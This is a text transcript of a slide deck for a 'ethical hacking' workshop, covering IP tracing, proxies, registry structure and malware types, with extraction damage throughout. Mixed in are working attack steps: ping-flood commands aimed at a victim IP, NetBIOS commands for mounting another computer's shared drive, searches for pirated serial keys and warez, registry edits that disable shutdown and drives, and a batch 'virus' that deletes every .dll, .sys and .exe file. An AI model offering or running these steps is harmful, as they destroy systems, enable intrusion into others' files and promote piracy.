workshop day1

Click here to load reader

Post on 29-May-2018

231 views

Category:

Documents

1 download

Embed Size (px)

TRANSCRIPT

  • 8/8/2019 Workshop Day1

    1/43

    Information Security andEthical hacking

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    2/43

    Internet Protocol(ip)Tracing ipDenial of services(DoS)SharingUnwanted AccessUsing proxies

    Windows HackRegistry editingMulti yahooChanging names of

    icons.Disabling features-

    shutdown,restart etc.

    Tips on Google surfingRapid share

    viruses,trojans,worms

    PhisersTools

    Brutus-brute forcesWindows passwordBackdoor Entry

    TrojansRemote employing monitors

    Other malicious tools

    Day 1 Day 2

    Binders

    Key loggingWindows passwordEtc..

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    3/43

    Ethical Hacking

    From E-commerce to information gathering and entertainment, the Internet hasevolved into a one-stop resource for both professional and personal purposes.

    Unfortunately, the same Internet is also used by computer criminals to carry out cyber

    crimes, such as identity theft and virus/worm/Trojan attacks, etc.

    Ethical hackers are the sentinels of the Internet. Their work involves understandingthe mind of the cyber criminal, tracing and tracking his functioning, and innovatingnew strategies and methods to safeguard online activity.

    Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing everyday, a career inthis field is also evolving into a professionally satisfying and monetarily lucrativeoption.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    4/43

    WHO AREHACKERS?

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    5/43

    WHO ARE HACKERS?

    Anarchist HackersTheir sole intent on system infiltration is to cause damage or use information to

    create havoc.

    HackersThey don t particularly care about bragging about their accomplishments as it

    exposes them to suspicion. They prefer to work from behind the scenes andpreserve their anonymity.

    Crackers

    This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    6/43

    Ethical Hacker

    Being able to attribute your attacks to the right type of attacker isvery important. By identifying your attacker to be either anAnarchist Hacker or a Hacker you get a better idea of what you reup against.

    Know your enemy and know yourself and you will always bevictorious...

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    7/43

    Ip Address

    32 bits combination.Staticdynamic

    own ip.Ipconfigwww.whatismyip.comwww.danasoft.com

    server ip addressping www.anylan.innslookup www.anylan.inwww.whois.se

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    8/43

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    9/43

    ip tracingtracert www.anylan.in

    Tracing ip during chatting

    Netstat nNetstat -a

    Port 5050 or 5101

    Tracing the ip locations

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    10/43

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    11/43

    E-mail Headers

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    12/43

    E-mail headers

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    13/43

    E-mail Headers

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    14/43

    Neo trace pro

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    15/43

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    16/43

    Proxywww.russianproxy.com

    www.kproxy.com

    www.cooltunnel.com

    www.mathtunnel.com

    hidemyip

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    17/43

    D oS Attack

    Conceptually, DoS attacks are intended to prevent legitimateusers, customers or clients of a site from successfully accessingit.

    Traditional DoS attacks have been aimed at consuming

    resources or disrupting services at the network or operatingsystem level.Typical examples are server-based attacks such as SYN floods

    and bandwidth exhaustion attacks that attempt to saturate thevictims Internet connection with spurious traffic.

    Death by overloading of system.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    18/43

    DO S Attack

    D enial O f Services

    In a denial-of-service (D

    oS) attack, an attacker attempts to prevent legitimate usersfrom accessing information or services. By targeting your computer and its networkconnection, or the computers and network of the sites you are trying to use, anattacker may be able to prevent you from accessing email, web sites, online accounts(banking, etc.), or other services that rely on the affected computer.

    p ing [IP ADDRESS HERE or WEBSITE] -t -l 15000

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    19/43

    D os & ddos

    O versized Packets

    This is called the "Ping of D eath" (ping -1 65510 192.168.2.3) an a Windows system

    (where 192.168.2.3 is the IP adress of the intended victim). What is happening is theattacker is pinging every port on the victims computer causing it to echo back 65510requests.

    The main goals of the "Ping of D eath" is to generate a packet size that exceeds 65,535bytes. Which can abrubtly cause the victim computer to crash.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    20/43

    D os

    Ping Attack

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    21/43

    D oS

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    22/43

    Symptoms O f D os

    unusually slow network performance (opening files or accessing web sites)

    unavailability of a particular web site

    inability to access any web site

    dramatic increase in the amount of spam you receive in your account

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    23/43

    NetBios

    Network Basic Input O utput System and is used as a way for computers in a LAN ora WAN (local network or internet/wider network) to share printers or drives.

    WAN attack that will be more interesting for most of you guys, and it is the WANattack that will be more dangerous.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    24/43

    Ste p s

    Start up your terminal (Start > run > cmd). You will be given this prompt:C:\WINDO WS>make sure the host is alive:

    C:\WINDO WS> ping 10.1.1.3If it is, you'll get something like this in response:Reply from 10.1.1.3: byte=32 time NBtSTAT -a 10.1.1.3HACKME-921J UNIQUE Registered

    MSHO ME GRO UP RegisteredHACKME-921J UNIQUE Registered

    HACKME-921J UNIQUE RegisteredMSHO ME GRO UP RegisteredHACKABLEUSER UNIQUE RegisteredMSHO ME UNIQUE Registered? That means that the target has files/folders/drives/etc. being shared on

    that computer

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    25/43

    C:\WINDO WS> NET VIEW \\10.1.1.3Which will hopefully give a response like this:

    Shared resources on 10.1.1.3Share name Type Comment

    --------------------------------------------C D isk

    D D iskCommand completed successfully.

    mount them locally:C:\WINDO WS> NET USE G: \\10.1.1.3\CCommand completed successfully.

    go to "My Computer" and browse those files.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    26/43

    serials

    In the search field type: "Product name" 94FBR

    Where, "Product Name" is the name of the item you want to find the serialnumber for.

    94FBR is part of a O ffice 2000 Pro cd key that is widely distributed as it bypassesthe activation requirements of O ffice 2K Pro. By searching for the product nameand 94fbr, you guarantee two things.1) The pages that are returned are pages dealing specifically with the product

    you're wanting a serial for.

    2) Because 94FBR is part of a serial number, and only part of a serial number, youguarantee that any page being returned is a serial number list page.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    27/43

    Unlimited Rapidshare download

    go to temporary internet files folder and delete all the cookies related to rapidshare.

    make a bat file and run it every timeipconfig /flushdnsipconfig /releaseipconfig /renewexit

    turn off on ur modem

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    28/43

    O ther google ways

    Look for Appz in Parent D irectory

    intext:"parent directory" intext:"[EXE]"

    intext:"parent directory" index of:"[EXE]"

    intext:"parent directory" index of:"[RAR]"

    This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.

    Look for Moviez in Parent D irectory

    intext:"parent directory" intext:"[VI D ]"

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    29/43

    intext:"parent directory" index of:"[VI D ]"

    This will look for any video filetype in parent directory. You can optionaly addindex:"xvid" or intext:"divx" for specific codec movie.

    Look for Muzik in Parent D irectory

    intext:"parent directory" intext:"[MP3]"

    intext:"parent directory" index of:"[MP3]"

    This will look for any music files.

    Look for Gamez in Parent D irectory

    intext:"parent directory" index of:"[Gamez]"

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    30/43

    RegistryThe Registry is a database used to store settings and options for the 32 bit

    versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. Itcontains information and settings for all the hardware, software, users, andpreferences of the PC. Whenever a user makes changes to a Control Panelsettings, or File Associations, System Policies, or installed software, the

    changes are reflected and stored in the Registry.The physical files that make up the registry are stored differently depending

    on your version of Windows; under Windows 95 & 98 it is contained in twohidden files in your Windows directory, called USER.DAT and SYSTEM.DAT,for Windows Me there is an additional CLASSES.DAT file, while under

    Windows NT/2000 the files are contained seperately in the%SystemRoot%\System32\Config directory. You can not edit these filesdirectly, you must use a tool commonly known as a "Registry Editor" to makeany changes (using registry editors will be discussed later in the article).

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    31/43

    The Registry has a hierarchal structureThere are six main branches, each containing a specific portion of the

    information stored in the Registry. They are as follows:

    * HKEY_CLASSES_ROOT - This branch contains all of your file associationmappings to support the drag-and-drop feature, OLE information, Windowsshortcuts, and core aspects of the Windows user interface.

    * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERSappropriate for the user currently logged onto the PC and cont ai ns inform a tion such a s logon n a mes, d esktop sett ings, a n d S ta rt menu sett ings.

    * HKEY_LOCAL_MACHINE - This branch cont ai ns computer spec if ic inform a tion ab out the type of h a r dwa re, soft wa re, a n d other preferences on a g iven PC , this information is used for all users who log onto this computer.

    * HKEY_USERS - This branch cont ai ns in divid u al preferences for e a ch user of the computer , each user is represented by a SID sub-key locatedunder the main branch.

    * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current h a r dwa re conf igur a tion.

    * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use wi th the Pl ug-&- Play fe a tures of Win d o w s, th is sect ion is dy m a n ic a n d will ch a nge a s d e vices a re add e da n d remo ve d from the s ystem.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    32/43

    Each registry value is stored as one of five main data types:

    * REG_BINARY - This type stores the value as raw bi n a r y da ta . Most

    hardware component information is stored as binary data, and can be displayedin an editor in hexadecimal format.* REG_DWORD - This type represents the data by a four by te num b er and is

    commonly used for b oo le a n val ues , such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, andcan be displayed in REGEDT32 in binary, hexadecimal and decimal format, or

    in REGEDIT in hexadecimal and decimal format.* REG_EXPAND_SZ - This type is an exp a n dabl e da ta str ing that is stringcontaining a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced bythe actual location of the directory containing the Windows NT system files.(This type is only available using an advanced registry editor such asREGEDT32)

    * REG_MULTI_SZ - This type is a mu ltip le str ing used to represent valuesthat contain lists or multiple values, each entry is separated by a NULLcharacter. (This type is only available using an advanced registry editor such asREGEDT32)

    * REG_SZ - This type is a st a n da r d str ing , used to represent human readabletext values.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    33/43

    Playing With RegistryTake backup of the registry

    [HKEY_LOCAL_MACHINE\SYSTEM\Setup]"SetupType"=dword:00000000"CmdLine"="setup -newsetup""SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

    Deleting the key values[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

    Use this feature with care, as deleting the wrong key or value could causemajor problems within the registry, so remember to always make a backupfirst.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    34/43

  • 8/8/2019 Workshop Day1

    35/43

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

    NoClose"="1

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

    "NoDrives"=dword:03ffffff $[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio

    n\Winlogon]

    "LegalNoticeCaption"="Caption here."

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    36/43

  • 8/8/2019 Workshop Day1

    37/43

    Multiple yahoo login

    Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.

    On the right page, right-click and choose new Dword value.

    Rename the value to Plural.

    Double click and assign a decimal value of 1

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    38/43

    Viruses , Worms and Trojans

    Types of virusesThere are many type of viruses. Typical viruses are simply programs or scriptsthat will do various damage to your computer, such as corrupting files, copyingitself into files, slowly deleting all your hard drive etc.

    WormsWorms are different type of viruses, but the same idea, but they are usuallydesigned to copy themselves a lot over a network and usually try to eat up asmuch bandwidth as possible by sending commands to servers to try to get in.

    TrojansTrojans are another type of virus. They are simply like a server in which enableshackers to get into and control the computer. A trojan such as Subseven canenable a hacker to do various things such as control the mouse, eject the cd-romdrive, delete/download/upload files and much more.

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    39/43

    Viruses , Worms and Trojans

    MBR virusesBoot sector viruses are another type, they are similar to file viruses, but insteadthey go in the boot sector and can cause serious damage when the computer isbooted, some can easily format your drive simply by booting your computer.These are hard to remove.

    .exe .com .bat .scr .pif .vbs

    E-mail,p2p

    the main thing to watch out for is the file size.

    Icons,binders

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    40/43

    Making a virus

    This virus is indetectible by antivirus scanners.open notepad and past this code:

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe

    www.informationsecurityclub.com

  • 8/8/2019 Workshop Day1

    41/43

  • 8/8/2019 Workshop Day1

    42/43

    Vbs-vb script

    www.informationsecurityclub.com

    onclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")

  • 8/8/2019 Workshop Day1

    43/43

    crash

    www.informationsecurityclub.com

    StartStartStartStart